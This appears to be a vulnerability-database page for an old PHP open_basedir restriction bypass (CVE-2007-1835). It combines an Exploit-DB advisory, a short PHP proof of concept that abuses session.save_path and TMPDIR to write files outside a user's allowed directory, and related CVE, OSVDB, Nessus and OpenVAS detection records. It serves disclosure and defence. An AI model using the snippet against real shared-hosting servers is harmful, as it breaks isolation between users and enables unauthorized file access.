ID EDB-ID:29801 Type exploitdb Reporter Stefan Esser Modified 2007-03-28T00:00:00
Description
PHP 5.2.1 Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass Vulnerability. CVE-2007-1835. Local exploit for php platform
source: http://www.securityfocus.com/bid/23183/info
PHP is prone to a 'open_basedir' restriction-bypass vulnerability due to a design error.
Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.
This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.
The following versions are vulnerable:
PHP 4 up to and including 4.4.6
PHP 5 up to and including 5.2.1
<?php
ini_set("session.save_path", "/sessions/user2/");
putenv("TMPDIR=/sessions/user2/");
ini_set("session.save_path", "");
@session_start();
?>
{"id": "EDB-ID:29801", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP <= 5.2.1 Session.Save_Path TMPDIR Open_Basedir Restriction Bypass Vulnerability", "description": "PHP 5.2.1 Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass Vulnerability. CVE-2007-1835. Local exploit for php platform", "published": "2007-03-28T00:00:00", "modified": "2007-03-28T00:00:00", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/29801/", "reporter": "Stefan Esser", "references": [], "cvelist": ["CVE-2007-1835"], "lastseen": "2016-02-03T11:09:31", "viewCount": 105, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2016-02-03T11:09:31", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1835"]}, {"type": "osvdb", "idList": ["OSVDB:33953"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7513"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310110174", "OPENVAS:1361412562310110175"]}, {"type": "nessus", "idList": ["PHP_4_4_5.NASL", "PHP_5_2_1.NASL"]}], "modified": "2016-02-03T11:09:31", "rev": 2}, "vulnersScore": 6.2}, "sourceHref": "https://www.exploit-db.com/download/29801/", "sourceData": "source: http://www.securityfocus.com/bid/23183/info\r\n\r\nPHP is prone to a 'open_basedir' restriction-bypass vulnerability due to a design error.\r\n\r\nSuccessful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.\r\n\r\nThis vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.\r\n\r\nThe following versions are vulnerable:\r\n\r\nPHP 4 up to and including 4.4.6\r\nPHP 5 up to and including 5.2.1 \r\n\r\n<?php\r\n ini_set(\"session.save_path\", \"/sessions/user2/\");\r\n putenv(\"TMPDIR=/sessions/user2/\");\r\n ini_set(\"session.save_path\", \"\");\r\n @session_start();\r\n?>", "osvdbidlist": ["33953"]}
{"cve": [{"lastseen": "2020-10-03T11:45:50", "description": "PHP 4 before 4.4.5 and PHP 5 before 5.2.1, when using an empty session save path (session.save_path), uses the TMPDIR default after checking the restrictions, which allows local users to bypass open_basedir restrictions.", "edition": 3, "cvss3": {}, "published": "2007-04-03T00:19:00", "title": "CVE-2007-1835", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1835"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.0", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:4.0", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:4.0.6"], "id": "CVE-2007-1835", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1835", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-1835"], "description": "## Vulnerability Description\nPHP contains a flaw that may allow an attacker to bypass security restrictions. The issue is due to an empty session save path (session.save_path) using the TMPDIR default after checking security restrictions. This may allow a local uesr to bypass the open_basedir security restriction.\n## Short Description\nPHP contains a flaw that may allow an attacker to bypass security restrictions. The issue is due to an empty session save path (session.save_path) using the TMPDIR default after checking security restrictions. This may allow a local uesr to bypass the open_basedir security restriction.\n## References:\nVendor URL: http://www.php.net/\n[Vendor Specific Advisory URL](http://www8.itrc.hp.com/service/cki/docDisplay.do?docId=c01056506)\n[Secunia Advisory ID:25850](https://secuniaresearch.flexerasoftware.com/advisories/25850/)\n[Secunia Advisory ID:25423](https://secuniaresearch.flexerasoftware.com/advisories/25423/)\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-36-2007.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0363.html\nKeyword: HPSBTU02232,SSRT071429\nKeyword: HPSBMA02215,SSRT071423\nKeyword: HPSBTU02232,SSRT071429,c01086137\n[CVE-2007-1835](https://vulners.com/cve/CVE-2007-1835)\nBugtraq ID: 23183\n", "edition": 1, "modified": "2007-03-28T16:41:14", "published": "2007-03-28T16:41:14", "href": "https://vulners.com/osvdb/OSVDB:33953", "id": "OSVDB:33953", "title": "PHP session.save_path open_basedir Restriction Bypass", "type": "osvdb", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "cvelist": ["CVE-2007-1835"], "description": "It's possible to create file in any directory by using environment variables.", "edition": 1, "modified": "2007-03-31T00:00:00", "published": "2007-03-31T00:00:00", "id": "SECURITYVULNS:VULN:7513", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7513", "title": "PHP session.save_path open_basedir protection bypass", "type": "securityvulns", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T04:54:21", "description": "According to its banner, the version of PHP installed on the remote\nhost is older than 4.4.5. Such versions may be affected by several\nissues, including buffer overflows, format string vulnerabilities,\narbitrary code execution, 'safe_mode' and 'open_basedir' bypasses, and\nclobbering of super-globals.", "edition": 25, "published": "2007-04-02T00:00:00", "title": "PHP < 4.4.5 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1701", "CVE-2007-1890", "CVE-2007-1885", "CVE-2007-1379", "CVE-2007-1835", "CVE-2007-1886", "CVE-2007-0907", "CVE-2007-0909", "CVE-2006-4625", "CVE-2007-1825", "CVE-2007-1884", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1286", "CVE-2007-1887", "CVE-2007-1376", "CVE-2007-1380", "CVE-2007-0905", "CVE-2007-1378", "CVE-2007-1700", "CVE-2007-0906", "CVE-2007-1777", "CVE-2007-0908"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_4_4_5.NASL", "href": "https://www.tenable.com/plugins/nessus/24906", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24906);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2006-4625\",\n \"CVE-2007-0905\",\n \"CVE-2007-0906\",\n \"CVE-2007-0907\",\n \"CVE-2007-0908\",\n \"CVE-2007-0909\",\n \"CVE-2007-0910\",\n \"CVE-2007-0988\",\n \"CVE-2007-1286\",\n \"CVE-2007-1376\",\n \"CVE-2007-1378\",\n \"CVE-2007-1379\",\n \"CVE-2007-1380\",\n \"CVE-2007-1700\",\n \"CVE-2007-1701\",\n \"CVE-2007-1777\",\n \"CVE-2007-1825\",\n \"CVE-2007-1835\",\n \"CVE-2007-1884\",\n \"CVE-2007-1885\",\n \"CVE-2007-1886\",\n \"CVE-2007-1887\",\n \"CVE-2007-1890\"\n );\n script_bugtraq_id(\n 22496, \n 22805, \n 22806, \n 22833, \n 22862,\n 23119, \n 23120, \n 23169, \n 23219,\n 23233, \n 23234, \n 23235,\n 23236\n );\n\n script_name(english:\"PHP < 4.4.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP installed on the remote\nhost is older than 4.4.5. Such versions may be affected by several\nissues, including buffer overflows, format string vulnerabilities,\narbitrary code execution, 'safe_mode' and 'open_basedir' bypasses, and\nclobbering of super-globals.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/4_4_5.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 4.4.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^3\\.\" ||\n version =~ \"^4\\.[0-3]\\.\" ||\n version =~ \"^4\\.4\\.[0-4]($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 4.4.5\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:54:22", "description": "According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.1. Such versions may be affected by several\nissues, including buffer overflows, format string vulnerabilities,\narbitrary code execution, 'safe_mode' and 'open_basedir' bypasses, and\nclobbering of super-globals.", "edition": 25, "published": "2007-04-02T00:00:00", "title": "PHP < 5.2.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6383", "CVE-2007-1701", "CVE-2007-1452", "CVE-2007-1890", "CVE-2007-1454", "CVE-2007-1885", "CVE-2007-1835", "CVE-2007-1886", "CVE-2007-0907", "CVE-2007-1824", "CVE-2007-1453", "CVE-2007-4586", "CVE-2007-0909", "CVE-2007-4441", "CVE-2007-1825", "CVE-2007-1884", "CVE-2007-0910", "CVE-2007-1383", "CVE-2007-0988", "CVE-2007-1887", "CVE-2007-1376", "CVE-2007-1889", "CVE-2007-1380", "CVE-2007-0905", "CVE-2007-1700", "CVE-2007-0906", "CVE-2007-0908"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_2_1.NASL", "href": "https://www.tenable.com/plugins/nessus/24907", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24907);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2006-6383\",\n \"CVE-2007-0905\",\n \"CVE-2007-0906\",\n \"CVE-2007-0907\",\n \"CVE-2007-0908\",\n \"CVE-2007-0909\",\n \"CVE-2007-0910\",\n \"CVE-2007-0988\",\n \"CVE-2007-1376\",\n \"CVE-2007-1380\",\n \"CVE-2007-1383\",\n \"CVE-2007-1452\",\n \"CVE-2007-1453\",\n \"CVE-2007-1454\",\n \"CVE-2007-1700\",\n \"CVE-2007-1701\",\n \"CVE-2007-1824\",\n \"CVE-2007-1825\",\n \"CVE-2007-1835\",\n \"CVE-2007-1884\",\n \"CVE-2007-1885\",\n \"CVE-2007-1886\",\n \"CVE-2007-1887\",\n \"CVE-2007-1889\",\n \"CVE-2007-1890\",\n \"CVE-2007-4441\",\n \"CVE-2007-4586\"\n );\n script_bugtraq_id(\n 21508, \n 22496, \n 22805,\n 22806,\n 22862,\n 22922,\n 23119,\n 23120,\n 23219,\n 23233, \n 23234, \n 23235, \n 23236, \n 23237, \n 23238\n );\n\n script_name(english:\"PHP < 5.2.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.1. Such versions may be affected by several\nissues, including buffer overflows, format string vulnerabilities,\narbitrary code execution, 'safe_mode' and 'open_basedir' bypasses, and\nclobbering of super-globals.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/5_2_1.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 119, 189, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^5\\.[01]\\.\" || \n version =~ \"^5\\.2\\.0($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.2.1\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:32:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1701", "CVE-2007-1890", "CVE-2007-1885", "CVE-2007-1379", "CVE-2007-1835", "CVE-2007-1886", "CVE-2007-0907", "CVE-2007-0909", "CVE-2006-4625", "CVE-2007-1825", "CVE-2007-1884", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1286", "CVE-2007-1887", "CVE-2007-1376", "CVE-2007-1380", "CVE-2007-0905", "CVE-2007-1378", "CVE-2007-1700", "CVE-2007-0906", "CVE-2007-1777", "CVE-2007-0908"], "description": "PHP version smaller than 4.4.5 suffers from multiple vulnerabilities.", "modified": "2018-07-09T00:00:00", "published": "2012-06-21T00:00:00", "id": "OPENVAS:1361412562310110174", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110174", "type": "openvas", "title": "PHP Version < 4.4.5 Multiple Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_4_4_5.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 4.4.5 Multiple Vulnerabilities\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110174\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2006-4625\", \"CVE-2007-0905\", \"CVE-2007-0906\", \"CVE-2007-0907\",\n \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\",\n \"CVE-2007-1286\", \"CVE-2007-1376\", \"CVE-2007-1378\", \"CVE-2007-1379\",\n \"CVE-2007-1380\", \"CVE-2007-1700\", \"CVE-2007-1701\", \"CVE-2007-1777\",\n \"CVE-2007-1825\", \"CVE-2007-1835\", \"CVE-2007-1884\", \"CVE-2007-1885\",\n \"CVE-2007-1886\", \"CVE-2007-1887\", \"CVE-2007-1890\");\n script_bugtraq_id(22496, 22805, 22806, 22833, 22862, 23119, 23120, 23169, 23219,\n 23233, 23234, 23235, 23236);\n script_name(\"PHP Version < 4.4.5 Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 4.4.5 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 4.4.5 suffers from multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"4.4.5\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.4.5\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6383", "CVE-2007-1701", "CVE-2007-1452", "CVE-2007-1890", "CVE-2007-1454", "CVE-2007-1885", "CVE-2007-1835", "CVE-2007-1886", "CVE-2007-0907", "CVE-2007-1824", "CVE-2007-1453", "CVE-2007-4586", "CVE-2007-0909", "CVE-2007-4441", "CVE-2007-1825", "CVE-2007-1884", "CVE-2007-0910", "CVE-2007-1383", "CVE-2007-0988", "CVE-2007-1887", "CVE-2007-1376", "CVE-2007-1889", "CVE-2007-1380", "CVE-2007-0905", "CVE-2007-1700", "CVE-2007-0906", "CVE-2007-0908"], "description": "PHP version smaller than 5.2.1 suffers from multiple vulnerabilities.", "modified": "2018-07-09T00:00:00", "published": "2012-06-21T00:00:00", "id": "OPENVAS:1361412562310110175", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110175", "type": "openvas", "title": "PHP Version < 5.2.1 Multiple Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_2_1.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 5.2.1 Multiple Vulnerabilities\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 